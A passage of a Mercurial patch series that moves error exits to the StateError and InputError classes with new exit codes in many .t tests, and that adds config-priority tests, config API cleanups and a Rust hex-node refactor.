@@ transaction abort! warn during abort abort: pretxncommit hook exited with status 1 - [255] + [40] $ hg verify checking changesets diff --git a/tests/test-share-bookmarks.t b/tests/test-share-bookmarks.t --- a/tests/test-share-bookmarks.t +++ b/tests/test-share-bookmarks.t @@ -102,7 +102,7 @@ transaction abort! 
rollback completed abort: pretxnclose hook exited with status 1 - [255] + [40] $ hg book bm1 FYI, in contrast to above test, bmX is invisible in repo1 (= shared @@ -127,7 +127,7 @@ transaction abort! rollback completed abort: pretxnclose hook exited with status 1 - [255] + [40] $ hg book bm3 clean up bm2 since it's uninteresting (not shared in the vfs case and @@ -249,7 +249,7 @@ no changes found adding remote bookmark bm3 abort: forced failure by extension - [255] + [40] $ hg boo bm1 3:b87954705719 bm4 5:92793bfc8cad diff --git a/tests/test-strip.t b/tests/test-strip.t --- a/tests/test-strip.t +++ b/tests/test-strip.t @@ -427,7 +427,7 @@ strip failed, unrecovered changes stored in '$TESTTMP/test/.hg/strip-backup/*-temp.hg' (glob) (fix the problem, then recover the changesets with "hg unbundle '$TESTTMP/test/.hg/strip-backup/*-temp.hg'") (glob) abort: pretxnchangegroup.bad hook exited with status 1 - [255] + [40] $ restore $ hg log -G o changeset: 4:443431ffac4f diff --git a/tests/test-tag.t b/tests/test-tag.t --- a/tests/test-tag.t +++ b/tests/test-tag.t @@ -290,7 +290,7 @@ $ rm -f .hg/last-message.txt $ HGEDITOR="\"sh\" \"`pwd`/editor.sh\"" hg tag custom-tag -e abort: pretag.test-saving-lastmessage hook exited with status 1 - [255] + [40] $ test -f .hg/last-message.txt [1] @@ -325,7 +325,7 @@ note: commit message saved in .hg/last-message.txt note: use 'hg commit --logfile .hg/last-message.txt --edit' to reuse it abort: pretxncommit.unexpectedabort hook exited with status 1 - [255] + [40] $ cat .hg/last-message.txt custom tag message second line diff --git a/tests/test-transplant.t b/tests/test-transplant.t --- a/tests/test-transplant.t +++ b/tests/test-transplant.t @@ -1091,7 +1091,7 @@ transaction abort! rollback completed abort: pretxncommit.abort hook exited with status 1 - [255] + [40] $ cat >> .hg/hgrc <<EOF > [hooks] > pretxncommit.abort = ! 
diff --git a/tests/test-win32text.t b/tests/test-win32text.t --- a/tests/test-win32text.t +++ b/tests/test-win32text.t @@ -38,7 +38,7 @@ transaction abort! rollback completed abort: pretxncommit.crlf hook failed - [255] + [40] $ mv .hg/hgrc .hg/hgrc.bak @@ -77,7 +77,7 @@ transaction abort! rollback completed abort: pretxnchangegroup.crlf hook failed - [255] + [40] $ mv .hg/hgrc.bak .hg/hgrc $ echo hello > f @@ -109,7 +109,7 @@ transaction abort! rollback completed abort: pretxncommit.crlf hook failed - [255] + [40] $ hg revert -a forgetting d/f2 $ rm d/f2 @@ -286,7 +286,7 @@ transaction abort! rollback completed abort: pretxnchangegroup.crlf hook failed - [255] + [40] $ hg log -v changeset: 5:f0b1c8d75fce # HG changeset patch # User Martin von Zweigbergk <martinvonz@google.com> # Date 1611964568 28800 # Fri Jan 29 15:56:08 2021 -0800 # Node ID dc00324e80f41ec5f5a7c4dc36b5c7af2390fda5 # Parent 7680565497374b00e832a1917065b9afec6b9f25 errors: use StateError more in merge module Differential Revision: https://phab.mercurial-scm.org/D9912 diff --git a/mercurial/merge.py b/mercurial/merge.py --- a/mercurial/merge.py +++ b/mercurial/merge.py @@ -233,7 +233,7 @@ else: warn(_(b"%s: untracked file differs\n") % f) if abortconflicts: - raise error.Abort( + raise error.StateError( _( b"untracked files in working directory " b"differ from files in requested revision" @@ -341,7 +341,7 @@ for f in pmmf: fold = util.normcase(f) if fold in foldmap: - raise error.Abort( + raise error.StateError( _(b"case-folding collision between %s and %s") % (f, foldmap[fold]) ) @@ -352,7 +352,7 @@ for fold, f in sorted(foldmap.items()): if fold.startswith(foldprefix) and not f.startswith(unfoldprefix): # the folded prefix matches but actual casing is different - raise error.Abort( + raise error.StateError( _(b"case-folding collision between %s and directory of %s") % (lastfull, f) ) @@ -504,7 +504,9 @@ if invalidconflicts: for p in invalidconflicts: repo.ui.warn(_(b"%s: is both a file and a 
directory\n") % p) - raise error.Abort(_(b"destination manifest contains path conflicts")) + raise error.StateError( + _(b"destination manifest contains path conflicts") + ) def _filternarrowactions(narrowmatch, branchmerge, mresult): @@ -1918,10 +1920,10 @@ ### check phase if not overwrite: if len(pl) > 1: - raise error.Abort(_(b"outstanding uncommitted merge")) + raise error.StateError(_(b"outstanding uncommitted merge")) ms = wc.mergestate() if ms.unresolvedcount(): - raise error.Abort( + raise error.StateError( _(b"outstanding merge conflicts"), hint=_(b"use 'hg resolve' to resolve"), ) @@ -2007,7 +2009,7 @@ if mresult.hasconflicts(): msg = _(b"conflicting changes") hint = _(b"commit or update --clean to discard changes") - raise error.Abort(msg, hint=hint) + raise error.StateError(msg, hint=hint) # Prompt and create actions. Most of this is in the resolve phase # already, but we can't handle .hgsubstate in filemerge or diff --git a/tests/test-audit-subrepo.t b/tests/test-audit-subrepo.t --- a/tests/test-audit-subrepo.t +++ b/tests/test-audit-subrepo.t @@ -323,7 +323,7 @@ new changesets 7a2f0e59146f .hgsubstate: untracked file differs abort: untracked files in working directory differ from files in requested revision - [255] + [20] $ cat main5/.hg/hgrc | grep pwned [1] @@ -623,7 +623,7 @@ new changesets * (glob) .hgsubstate: untracked file differs abort: untracked files in working directory differ from files in requested revision - [255] + [20] $ ls "$FAKEHOME" a $ test -d "$FAKEHOME/.hg" @@ -652,7 +652,7 @@ new changesets * (glob) .hgsubstate: untracked file differs abort: untracked files in working directory differ from files in requested revision - [255] + [20] $ ls -A "$FAKEHOME" .hg a diff --git a/tests/test-largefiles.t b/tests/test-largefiles.t --- a/tests/test-largefiles.t +++ b/tests/test-largefiles.t @@ -1751,7 +1751,7 @@ $ hg rm sub2/large6 $ hg up -r. 
abort: outstanding uncommitted merge - [255] + [20] - revert should be able to revert files introduced in a pending merge $ hg revert --all -r . diff --git a/tests/test-merge-remove.t b/tests/test-merge-remove.t --- a/tests/test-merge-remove.t +++ b/tests/test-merge-remove.t @@ -95,7 +95,7 @@ $ hg merge bar: untracked file differs abort: untracked files in working directory differ from files in requested revision - [255] + [20] $ cat bar memories of buried pirate treasure diff --git a/tests/test-merge1.t b/tests/test-merge1.t --- a/tests/test-merge1.t +++ b/tests/test-merge1.t @@ -113,7 +113,7 @@ $ hg merge 1 b: untracked file differs abort: untracked files in working directory differ from files in requested revision - [255] + [20] #if symlink symlinks to directories should be treated as regular files (issue5027) @@ -122,7 +122,7 @@ $ hg merge 1 b: untracked file differs abort: untracked files in working directory differ from files in requested revision - [255] + [20] symlinks shouldn't be followed $ rm b $ echo This is file b1 > .hg/b @@ -130,7 +130,7 @@ $ hg merge 1 b: untracked file differs abort: untracked files in working directory differ from files in requested revision - [255] + [20] $ rm b $ echo This is file b2 > b @@ -144,7 +144,7 @@ $ hg merge 1 --config merge.checkunknown=abort b: untracked file differs abort: untracked files in working directory differ from files in requested revision - [255] + [20] this merge should warn $ hg merge 1 --config merge.checkunknown=warn @@ -188,7 +188,7 @@ $ hg merge 3 --config merge.checkignored=ignore --config merge.checkunknown=abort remoteignored: untracked file differs abort: untracked files in working directory differ from files in requested revision - [255] + [20] $ hg merge 3 --config merge.checkignored=abort --config merge.checkunknown=ignore merging .hgignore merging for .hgignore @@ -210,15 +210,15 @@ b: untracked file differs localignored: untracked file differs abort: untracked files in working directory 
differ from files in requested revision - [255] + [20] $ hg merge 3 --config merge.checkignored=abort --config merge.checkunknown=ignore localignored: untracked file differs abort: untracked files in working directory differ from files in requested revision - [255] + [20] $ hg merge 3 --config merge.checkignored=warn --config merge.checkunknown=abort b: untracked file differs abort: untracked files in working directory differ from files in requested revision - [255] + [20] $ hg merge 3 --config merge.checkignored=warn --config merge.checkunknown=warn b: replacing untracked file localignored: replacing untracked file diff --git a/tests/test-pathconflicts-basic.t b/tests/test-pathconflicts-basic.t --- a/tests/test-pathconflicts-basic.t +++ b/tests/test-pathconflicts-basic.t @@ -53,7 +53,7 @@ $ hg up file a: untracked directory conflicts with file abort: untracked files in working directory differ from files in requested revision - [255] + [20] $ hg up --clean file 1 files updated, 0 files merged, 0 files removed, 0 files unresolved (activating bookmark file) diff --git a/tests/test-pathconflicts-update.t b/tests/test-pathconflicts-update.t --- a/tests/test-pathconflicts-update.t +++ b/tests/test-pathconflicts-update.t @@ -49,7 +49,7 @@ $ hg up dir a/b: untracked file conflicts with directory abort: untracked files in working directory differ from files in requested revision - [255] + [20] $ hg up dir --config merge.checkunknown=warn a/b: replacing untracked file 1 files updated, 0 files merged, 0 files removed, 0 files unresolved @@ -70,7 +70,7 @@ $ hg up dir a/b: untracked file conflicts with directory abort: untracked files in working directory differ from files in requested revision - [255] + [20] $ hg up dir --config merge.checkunknown=warn a/b: replacing untracked file 1 files updated, 0 files merged, 0 files removed, 0 files unresolved @@ -89,7 +89,7 @@ $ hg up file a/b: untracked directory conflicts with file abort: untracked files in working directory differ 
from files in requested revision - [255] + [20] $ hg up file --config merge.checkunknown=warn a/b: replacing untracked files in directory 1 files updated, 0 files merged, 0 files removed, 0 files unresolved @@ -107,7 +107,7 @@ $ hg up link a/b: untracked directory conflicts with file abort: untracked files in working directory differ from files in requested revision - [255] + [20] $ hg up link --config merge.checkunknown=warn a/b: replacing untracked files in directory 1 files updated, 0 files merged, 0 files removed, 0 files unresolved diff --git a/tests/test-remotefilelog-prefetch.t b/tests/test-remotefilelog-prefetch.t --- a/tests/test-remotefilelog-prefetch.t +++ b/tests/test-remotefilelog-prefetch.t @@ -180,7 +180,7 @@ x: untracked file differs 3 files fetched over 1 fetches - (3 misses, 0.00% hit ratio) over * (glob) abort: untracked files in working directory differ from files in requested revision - [255] + [20] $ hg revert --all # Test batch fetching of lookup files during hg status diff --git a/tests/test-rename-dir-merge.t b/tests/test-rename-dir-merge.t --- a/tests/test-rename-dir-merge.t +++ b/tests/test-rename-dir-merge.t @@ -110,7 +110,7 @@ $ hg merge 2 b/c: untracked file differs abort: untracked files in working directory differ from files in requested revision - [255] + [20] $ cat b/c target but it should succeed if the content matches diff --git a/tests/test-resolve.t b/tests/test-resolve.t --- a/tests/test-resolve.t +++ b/tests/test-resolve.t @@ -153,15 +153,15 @@ $ hg up 0 abort: outstanding merge conflicts (use 'hg resolve' to resolve) - [255] + [20] $ hg merge 2 abort: outstanding merge conflicts (use 'hg resolve' to resolve) - [255] + [20] $ hg merge --force 2 abort: outstanding merge conflicts (use 'hg resolve' to resolve) - [255] + [20] set up conflict-free merge diff --git a/tests/test-up-local-change.t b/tests/test-up-local-change.t --- a/tests/test-up-local-change.t +++ b/tests/test-up-local-change.t @@ -175,7 +175,7 @@ $ hg up 1 b: 
untracked file differs abort: untracked files in working directory differ from files in requested revision - [255] + [20] $ rm b test conflicting untracked ignored file @@ -195,7 +195,7 @@ $ hg up 'desc("add ignored file")' ignored: untracked file differs abort: untracked files in working directory differ from files in requested revision - [255] + [20] test a local add diff --git a/tests/test-update-branches.t b/tests/test-update-branches.t --- a/tests/test-update-branches.t +++ b/tests/test-update-branches.t @@ -324,7 +324,7 @@ $ hg up -q 4 abort: conflicting changes (commit or update --clean to discard changes) - [255] + [20] $ hg up -m 4 merging a warning: conflicts while merging a! (edit, then use 'hg resolve --mark') # HG changeset patch # User Martin von Zweigbergk <martinvonz@google.com> # Date 1611966413 28800 # Fri Jan 29 16:26:53 2021 -0800 # Node ID 6894c9ef4dcd3511c9baf7cdce72a65b4385ccc8 # Parent dc00324e80f41ec5f5a7c4dc36b5c7af2390fda5 errors: use InputError for incorrectly formatted dates Differential Revision: https://phab.mercurial-scm.org/D9913 diff --git a/mercurial/utils/dateutil.py b/mercurial/utils/dateutil.py --- a/mercurial/utils/dateutil.py +++ b/mercurial/utils/dateutil.py @@ -68,7 +68,9 @@ timestamp = time.time() if timestamp < 0: hint = _(b"check your clock") - raise error.Abort(_(b"negative timestamp: %d") % timestamp, hint=hint) + raise error.InputError( + _(b"negative timestamp: %d") % timestamp, hint=hint + ) delta = datetime.datetime.utcfromtimestamp( timestamp ) - datetime.datetime.fromtimestamp(timestamp) @@ -328,24 +330,26 @@ date = date.strip() if not date: - raise error.Abort(_(b"dates cannot consist entirely of whitespace")) + raise error.InputError( + _(b"dates cannot consist entirely of whitespace") + ) elif date[0:1] == b"<": if not date[1:]: - raise error.Abort(_(b"invalid day spec, use '<DATE'")) + raise error.InputError(_(b"invalid day spec, use '<DATE'")) when = upper(date[1:]) return lambda x: x <= when elif date[0:1] 
== b">": if not date[1:]: - raise error.Abort(_(b"invalid day spec, use '>DATE'")) + raise error.InputError(_(b"invalid day spec, use '>DATE'")) when = lower(date[1:]) return lambda x: x >= when elif date[0:1] == b"-": try: days = int(date[1:]) except ValueError: - raise error.Abort(_(b"invalid day spec: %s") % date[1:]) + raise error.InputError(_(b"invalid day spec: %s") % date[1:]) if days < 0: - raise error.Abort( + raise error.InputError( _(b"%s must be nonnegative (see 'hg help dates')") % date[1:] ) when = makedate()[0] - days * 3600 * 24 diff --git a/tests/test-parse-date.t b/tests/test-parse-date.t --- a/tests/test-parse-date.t +++ b/tests/test-parse-date.t @@ -103,43 +103,43 @@ $ hg log -d "--2" abort: -2 must be nonnegative (see 'hg help dates') - [255] + [10] Whitespace only $ hg log -d " " abort: dates cannot consist entirely of whitespace - [255] + [10] Test date formats with '>' or '<' accompanied by space characters $ hg log -d '>' --template '{date|date}\n' abort: invalid day spec, use '>DATE' - [255] + [10] $ hg log -d '<' --template '{date|date}\n' abort: invalid day spec, use '<DATE' - [255] + [10] $ hg log -d ' >' --template '{date|date}\n' abort: invalid day spec, use '>DATE' - [255] + [10] $ hg log -d ' <' --template '{date|date}\n' abort: invalid day spec, use '<DATE' - [255] + [10] $ hg log -d '> ' --template '{date|date}\n' abort: invalid day spec, use '>DATE' - [255] + [10] $ hg log -d '< ' --template '{date|date}\n' abort: invalid day spec, use '<DATE' - [255] + [10] $ hg log -d ' > ' --template '{date|date}\n' abort: invalid day spec, use '>DATE' - [255] + [10] $ hg log -d ' < ' --template '{date|date}\n' abort: invalid day spec, use '<DATE' - [255] + [10] $ hg log -d '>02/01' --template '{date|date}\n' $ hg log -d '<02/01' --template '{date|date}\n' # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1611916947 -3600 # Fri Jan 29 11:42:27 2021 +0100 # Node ID 4ae85340d5ebdb2e04f091bafdb1b581609e9489 # 
Parent 6894c9ef4dcd3511c9baf7cdce72a65b4385ccc8 config: add a test for priority when includes are involved Differential Revision: https://phab.mercurial-scm.org/D9915 diff --git a/tests/test-config.t b/tests/test-config.t --- a/tests/test-config.t +++ b/tests/test-config.t @@ -388,3 +388,26 @@ > done $ HGRCPATH=configs hg config section.key 99 + +Configuration priority +====================== + +setup necessary file + + $ cat > file-A.rc << EOF + > [config-test] + > basic = value-A + > EOF + + $ cat > file-B.rc << EOF + > [config-test] + > basic = value-B + > EOF + +Simple order checking +--------------------- + +If file B is read after file A, value from B overwrite value from A. + + $ HGRCPATH="file-A.rc:file-B.rc" hg config config-test.basic + value-B # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1611917433 -3600 # Fri Jan 29 11:50:33 2021 +0100 # Node ID 9d49ae51aa56578c5eda94bbc3d400af13b9f7c4 # Parent 4ae85340d5ebdb2e04f091bafdb1b581609e9489 config: test priority involving include Differential Revision: https://phab.mercurial-scm.org/D9916 diff --git a/tests/test-config.t b/tests/test-config.t --- a/tests/test-config.t +++ b/tests/test-config.t @@ -397,6 +397,9 @@ $ cat > file-A.rc << EOF > [config-test] > basic = value-A + > pre-include= value-A + > %include ./included.rc + > post-include= value-A > EOF $ cat > file-B.rc << EOF @@ -404,6 +407,13 @@ > basic = value-B > EOF + + $ cat > included.rc << EOF + > [config-test] + > pre-include= value-included + > post-include= value-included + > EOF + Simple order checking --------------------- @@ -411,3 +421,13 @@ $ HGRCPATH="file-A.rc:file-B.rc" hg config config-test.basic value-B + +Ordering from include +--------------------- + +value from an include overwrite value defined before the include, but not the one defined after the include + + $ HGRCPATH="file-A.rc" hg config config-test.pre-include + value-included + $ HGRCPATH="file-A.rc" hg config config-test.post-include + 
value-A # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1611921830 -3600 # Fri Jan 29 13:03:50 2021 +0100 # Node ID 821775843caf16d957a2ef2b350e7f726b6742c1 # Parent 9d49ae51aa56578c5eda94bbc3d400af13b9f7c4 config: test priority involving the command line Differential Revision: https://phab.mercurial-scm.org/D9917 diff --git a/tests/test-config.t b/tests/test-config.t --- a/tests/test-config.t +++ b/tests/test-config.t @@ -431,3 +431,9 @@ value-included $ HGRCPATH="file-A.rc" hg config config-test.post-include value-A + +command line override +--------------------- + + $ HGRCPATH="file-A.rc:file-B.rc" hg config config-test.basic --config config-test.basic=value-CLI + value-CLI # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1611925381 -3600 # Fri Jan 29 14:03:01 2021 +0100 # Node ID 271dfcb98544fd05cc7e85cc180dc0cd9e7790cb # Parent 821775843caf16d957a2ef2b350e7f726b6742c1 config: use the right API to access subrepository section Preventing direct access to the underlying dict will help a coming refactoring of `config`. Differential Revision: https://phab.mercurial-scm.org/D9921 diff --git a/mercurial/subrepoutil.py b/mercurial/subrepoutil.py --- a/mercurial/subrepoutil.py +++ b/mercurial/subrepoutil.py @@ -105,7 +105,7 @@ return src state = {} - for path, src in p[b''].items(): + for path, src in p.items(b''): kind = b'hg' if src.startswith(b'['): if b']' not in src: # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1611925419 -3600 # Fri Jan 29 14:03:39 2021 +0100 # Node ID 5272542196cc6d7ee05f33fe5abd9c006a964650 # Parent 271dfcb98544fd05cc7e85cc180dc0cd9e7790cb config: use the right API to access template access Preventing direct access to the underlying dict will help a coming refactoring of `config`. 
Differential Revision: https://phab.mercurial-scm.org/D9922 diff --git a/mercurial/templater.py b/mercurial/templater.py --- a/mercurial/templater.py +++ b/mercurial/templater.py @@ -891,7 +891,7 @@ fp = _open_mapfile(path) cache, tmap, aliases = _readmapfile(fp, path) - for key, val in conf[b'templates'].items(): + for key, val in conf.items(b'templates'): if not val: raise error.ParseError( _(b'missing value'), conf.source(b'templates', key) @@ -904,7 +904,7 @@ cache[key] = unquotestring(val) elif key != b'__base__': tmap[key] = os.path.join(base, val) - aliases.extend(conf[b'templatealias'].items()) + aliases.extend(conf.items(b'templatealias')) return cache, tmap, aliases # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1611963414 -3600 # Sat Jan 30 00:36:54 2021 +0100 # Node ID f7621fa14b849ba79e6624beaff03b6a9e7d5592 # Parent 5272542196cc6d7ee05f33fe5abd9c006a964650 config: use the right API to access git-submodule Differential Revision: https://phab.mercurial-scm.org/D9923 diff --git a/hgext/convert/git.py b/hgext/convert/git.py --- a/hgext/convert/git.py +++ b/hgext/convert/git.py @@ -247,7 +247,8 @@ b'\n'.join(line.strip() for line in content.split(b'\n')), ) for sec in c.sections(): - s = c[sec] + # turn the config object into a real dict + s = dict(c.items(sec)) if b'url' in s and b'path' in s: self.submodules.append(submodule(s[b'path'], b'', s[b'url'])) # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1611924379 -3600 # Fri Jan 29 13:46:19 2021 +0100 # Node ID 0da465780bba420620809d2501510a282afbd8b9 # Parent f7621fa14b849ba79e6624beaff03b6a9e7d5592 rhg: Build in release mode on CI This follows e73b40c790ec which made tests use the release executable. With e73b40c790ec but not this, tests are skipped on CI because the executable is missing. 
Differential Revision: https://phab.mercurial-scm.org/D9907 diff --git a/contrib/heptapod-ci.yml b/contrib/heptapod-ci.yml --- a/contrib/heptapod-ci.yml +++ b/contrib/heptapod-ci.yml @@ -32,7 +32,7 @@ - hg -R /tmp/mercurial-ci/ update `hg log --rev '.' --template '{node}'` - ls -1 tests/test-check-*.* > /tmp/check-tests.txt - cd /tmp/mercurial-ci/rust/rhg - - cargo build + - cargo build --release - cd /tmp/mercurial-ci/ # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1611572423 -3600 # Mon Jan 25 12:00:23 2021 +0100 # Node ID 6380efb821912f25177103bdeec40d536dd6f919 # Parent 0da465780bba420620809d2501510a282afbd8b9 rust: replace Node::encode_hex with std::fmt::LowerHex This avoids allocating intermediate strings. Differential Revision: https://phab.mercurial-scm.org/D9860 diff --git a/rust/hg-core/examples/nodemap/main.rs b/rust/hg-core/examples/nodemap/main.rs --- a/rust/hg-core/examples/nodemap/main.rs +++ b/rust/hg-core/examples/nodemap/main.rs @@ -66,7 +66,7 @@ .collect(); if queries < 10 { let nodes_hex: Vec<String> = - nodes.iter().map(|n| n.encode_hex()).collect(); + nodes.iter().map(|n| format!("{:x}", n)).collect(); println!("Nodes: {:?}", nodes_hex); } let mut last: Option<Revision> = None; @@ -76,11 +76,11 @@ } let elapsed = start.elapsed(); println!( - "Did {} queries in {:?} (mean {:?}), last was {:?} with result {:?}", + "Did {} queries in {:?} (mean {:?}), last was {:x} with result {:?}", queries, elapsed, elapsed / (queries as u32), - nodes.last().unwrap().encode_hex(), + nodes.last().unwrap(), last ); } diff --git a/rust/hg-core/src/revlog/node.rs b/rust/hg-core/src/revlog/node.rs --- a/rust/hg-core/src/revlog/node.rs +++ b/rust/hg-core/src/revlog/node.rs @@ -11,6 +11,7 @@ use bytes_cast::BytesCast; use hex::{self, FromHex, FromHexError}; use std::convert::TryFrom; +use std::fmt; /// The length in bytes of a `Node` /// @@ -80,6 +81,15 @@ } } +impl fmt::LowerHex for Node { + fn fmt(&self, f: &mut fmt::Formatter) -> 
fmt::Result { + for &byte in &self.data { + write!(f, "{:02x}", byte)? + } + Ok(()) + } +} + #[derive(Debug, PartialEq)] pub enum NodeError { ExactLengthRequired(usize, String), @@ -124,14 +134,6 @@ .into()) } - /// Convert to hexadecimal string representation - /// - /// To be used in FFI and I/O only, in order to facilitate future - /// changes of hash format. - pub fn encode_hex(&self) -> String { - hex::encode(self.data) - } - /// Provide access to binary data /// /// This is needed by FFI layers, for instance to return expected @@ -349,7 +351,7 @@ #[test] fn test_node_encode_hex() { - assert_eq!(sample_node().encode_hex(), sample_node_hex()); + assert_eq!(format!("{:x}", sample_node()), sample_node_hex()); } #[test] @@ -391,7 +393,7 @@ "testgr".to_string() )) ); - let mut long = NULL_NODE.encode_hex(); + let mut long = format!("{:x}", NULL_NODE); long.push('c'); match NodePrefix::from_hex(&long) .expect_err("should be refused as too long") # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1611574119 -3600 # Mon Jan 25 12:28:39 2021 +0100 # Node ID 5893706af3decde7b3a63ec4b4fa188d02cddecb # Parent 6380efb821912f25177103bdeec40d536dd6f919 rust: Simplify error type for reading hex node IDs If a string is not valid hexadecimal it’s not that useful to track the precise reason. Differential Revision: https://phab.mercurial-scm.org/D9861 diff --git a/rust/hg-core/src/revlog.rs b/rust/hg-core/src/revlog.rs --- a/rust/hg-core/src/revlog.rs +++ b/rust/hg-core/src/revlog.rs @@ -9,7 +9,7 @@ pub mod nodemap; mod nodemap_docket; pub mod path_encode; -pub use node::{Node, NodeError, NodePrefix, NodePrefixRef}; +pub use node::{FromHexError, Node, NodePrefix, NodePrefixRef}; pub mod changelog; pub mod index; pub mod manifest; diff --git a/rust/hg-core/src/revlog/node.rs b/rust/hg-core/src/revlog/node.rs --- a/rust/hg-core/src/revlog/node.rs +++ b/rust/hg-core/src/revlog/node.rs @@ -9,7 +9,7 @@ //! of a revision. 
use bytes_cast::BytesCast; -use hex::{self, FromHex, FromHexError}; +use hex::{self, FromHex}; use std::convert::TryFrom; use std::fmt; @@ -47,10 +47,9 @@ /// if they need a loop boundary. /// /// All methods that create a `Node` either take a type that enforces -/// the size or fail immediately at runtime with [`ExactLengthRequired`]. +/// the size or return an error at runtime. /// /// [`nybbles_len`]: #method.nybbles_len -/// [`ExactLengthRequired`]: struct.NodeError#variant.ExactLengthRequired #[derive(Clone, Debug, PartialEq, BytesCast)] #[repr(transparent)] pub struct Node { @@ -90,12 +89,8 @@ } } -#[derive(Debug, PartialEq)] -pub enum NodeError { - ExactLengthRequired(usize, String), - PrefixTooLong(String), - HexError(FromHexError, String), -} +#[derive(Debug)] +pub struct FromHexError; /// Low level utility function, also for prefixes fn get_nybble(s: &[u8], i: usize) -> u8 { @@ -128,9 +123,9 @@ /// /// To be used in FFI and I/O only, in order to facilitate future /// changes of hash format. - pub fn from_hex(hex: impl AsRef<[u8]>) -> Result<Node, NodeError> { + pub fn from_hex(hex: impl AsRef<[u8]>) -> Result<Node, FromHexError> { Ok(NodeData::from_hex(hex.as_ref()) - .map_err(|e| NodeError::from((e, hex)))? + .map_err(|_| FromHexError)? .into()) } @@ -143,19 +138,6 @@ } } -impl<T: AsRef<[u8]>> From<(FromHexError, T)> for NodeError { - fn from(err_offender: (FromHexError, T)) -> Self { - let (err, offender) = err_offender; - let offender = String::from_utf8_lossy(offender.as_ref()).into_owned(); - match err { - FromHexError::InvalidStringLength => { - NodeError::ExactLengthRequired(NODE_NYBBLES_LENGTH, offender) - } - _ => NodeError::HexError(err, offender), - } - } -} - /// The beginning of a binary revision SHA. /// /// Since it can potentially come from an hexadecimal representation with @@ -175,31 +157,22 @@ /// /// To be used in FFI and I/O only, in order to facilitate future /// changes of hash format. 
- pub fn from_hex(hex: impl AsRef<[u8]>) -> Result<Self, NodeError> { + pub fn from_hex(hex: impl AsRef<[u8]>) -> Result<Self, FromHexError> { let hex = hex.as_ref(); let len = hex.len(); if len > NODE_NYBBLES_LENGTH { - return Err(NodeError::PrefixTooLong( - String::from_utf8_lossy(hex).to_owned().to_string(), - )); + return Err(FromHexError); } let is_odd = len % 2 == 1; let even_part = if is_odd { &hex[..len - 1] } else { hex }; let mut buf: Vec<u8> = - Vec::from_hex(&even_part).map_err(|e| (e, hex))?; + Vec::from_hex(&even_part).map_err(|_| FromHexError)?; if is_odd { let latest_char = char::from(hex[len - 1]); - let latest_nybble = latest_char.to_digit(16).ok_or_else(|| { - ( - FromHexError::InvalidHexCharacter { - c: latest_char, - index: len - 1, - }, - hex, - ) - })? as u8; + let latest_nybble = + latest_char.to_digit(16).ok_or_else(|| FromHexError)? as u8; buf.push(latest_nybble << 4); } Ok(NodePrefix { buf, is_odd }) @@ -329,24 +302,15 @@ #[test] fn test_node_from_hex() { - assert_eq!(Node::from_hex(&sample_node_hex()), Ok(sample_node())); + assert_eq!(Node::from_hex(&sample_node_hex()).unwrap(), sample_node()); let mut short = hex_pad_right("0123"); short.pop(); short.pop(); - assert_eq!( - Node::from_hex(&short), - Err(NodeError::ExactLengthRequired(NODE_NYBBLES_LENGTH, short)), - ); + assert!(Node::from_hex(&short).is_err()); let not_hex = hex_pad_right("012... 
oops"); - assert_eq!( - Node::from_hex(¬_hex), - Err(NodeError::HexError( - FromHexError::InvalidHexCharacter { c: '.', index: 3 }, - not_hex, - )), - ); + assert!(Node::from_hex(¬_hex).is_err(),); } #[test] @@ -355,7 +319,7 @@ } #[test] - fn test_prefix_from_hex() -> Result<(), NodeError> { + fn test_prefix_from_hex() -> Result<(), FromHexError> { assert_eq!( NodePrefix::from_hex("0e1")?, NodePrefix { @@ -386,25 +350,14 @@ #[test] fn test_prefix_from_hex_errors() { - assert_eq!( - NodePrefix::from_hex("testgr"), - Err(NodeError::HexError( - FromHexError::InvalidHexCharacter { c: 't', index: 0 }, - "testgr".to_string() - )) - ); + assert!(NodePrefix::from_hex("testgr").is_err()); let mut long = format!("{:x}", NULL_NODE); long.push('c'); - match NodePrefix::from_hex(&long) - .expect_err("should be refused as too long") - { - NodeError::PrefixTooLong(s) => assert_eq!(s, long), - err => panic!(format!("Should have been TooLong, got {:?}", err)), - } + assert!(NodePrefix::from_hex(&long).is_err()) } #[test] - fn test_is_prefix_of() -> Result<(), NodeError> { + fn test_is_prefix_of() -> Result<(), FromHexError> { let mut node_data = [0; NODE_BYTES_LENGTH]; node_data[0] = 0x12; node_data[1] = 0xca; @@ -417,7 +370,7 @@ } #[test] - fn test_get_nybble() -> Result<(), NodeError> { + fn test_get_nybble() -> Result<(), FromHexError> { let prefix = NodePrefix::from_hex("dead6789cafe")?; assert_eq!(prefix.borrow().get_nybble(0), 13); assert_eq!(prefix.borrow().get_nybble(7), 9); diff --git a/rust/hg-core/src/revlog/nodemap.rs b/rust/hg-core/src/revlog/nodemap.rs --- a/rust/hg-core/src/revlog/nodemap.rs +++ b/rust/hg-core/src/revlog/nodemap.rs @@ -13,7 +13,7 @@ //! is used in a more abstract context. 
use super::{ - node::NULL_NODE, Node, NodeError, NodePrefix, NodePrefixRef, Revision, + node::NULL_NODE, FromHexError, Node, NodePrefix, NodePrefixRef, Revision, RevlogIndex, NULL_REVISION, }; @@ -27,14 +27,14 @@ #[derive(Debug, PartialEq)] pub enum NodeMapError { MultipleResults, - InvalidNodePrefix(NodeError), + InvalidNodePrefix, /// A `Revision` stored in the nodemap could not be found in the index RevisionNotInIndex(Revision), } -impl From<NodeError> for NodeMapError { - fn from(err: NodeError) -> Self { - NodeMapError::InvalidNodePrefix(err) +impl From<FromHexError> for NodeMapError { + fn from(_: FromHexError) -> Self { + NodeMapError::InvalidNodePrefix } } diff --git a/rust/hg-cpython/src/revlog.rs b/rust/hg-cpython/src/revlog.rs --- a/rust/hg-cpython/src/revlog.rs +++ b/rust/hg-cpython/src/revlog.rs @@ -18,7 +18,7 @@ use hg::{ nodemap::{Block, NodeMapError, NodeTree}, revlog::{nodemap::NodeMap, RevlogIndex}, - NodeError, Revision, + Revision, }; use std::cell::RefCell; @@ -468,17 +468,12 @@ match err { NodeMapError::MultipleResults => revlog_error(py), 